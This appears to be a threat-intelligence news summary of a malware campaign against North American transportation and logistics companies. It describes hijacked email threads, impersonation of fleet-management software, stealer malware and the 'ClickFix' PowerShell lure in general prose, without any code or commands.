Researchers are tracking a concerning malware campaign targeting transportation and logistics companies across North America. The threat actors behind the campaign use compromised legitimate email accounts to inject malicious content into ongoing email conversations, making the attacks appear more credible.
This campaign, which has been active since May 2024, involves a variety of malware payloads, including Lumma Stealer, StealC, and DanaBot. In recent months, the attackers have adapted their methods, employing new infrastructure and techniques such as “ClickFix” to deliver malware via Base64-encoded PowerShell scripts.
At this time, researchers are still unclear how the attackers were able to gain initial access to the compromised email accounts.
By impersonating industry-specific software like Samsara and Astra TMS, the attackers craft phishing emails that not only mimic the language and workflows common in the shipping and logistics sector but also suggest they conduct thorough research into their targets before launching their campaigns, significantly increasing the chances of a successful breach.
Why It Matters: Cybercriminals are refining their social engineering tactics to blend malicious activity seamlessly into real email conversations, increasing the risk of malware infection. By targeting transportation and logistics companies and impersonating specialized software, this campaign showcases a strategic focus on sectors crucial to supply chains and critical infrastructure. Organizations in these industries need to remain vigilant to avoid falling victim to increasingly sophisticated phishing tactics.
- Compromised Legitimate Accounts: The threat actors use compromised email accounts from transportation companies, injecting malicious content into existing conversations, making it harder for victims to detect the threat.
- Variety of Malware: From May to July 2024, the campaign delivered Lumma Stealer, StealC, and DanaBot. In August 2024, the attackers introduced the “ClickFix” technique, where victims are led through dialogue boxes to copy and paste a PowerShell script that downloads malware.
- Targeted Sector: The campaign focuses on North American transport and logistics companies, impersonating software like Samsara and Astra TMS, which are commonly used in fleet management.
- Financially Motivated: Researchers assess that these attacks are likely financially driven, though the actors remain unidentified. The use of commodity malware like DanaBot and third-party infrastructure points to involvement in the broader cybercriminal ecosystem, relying on widely available tools rather than custom malware.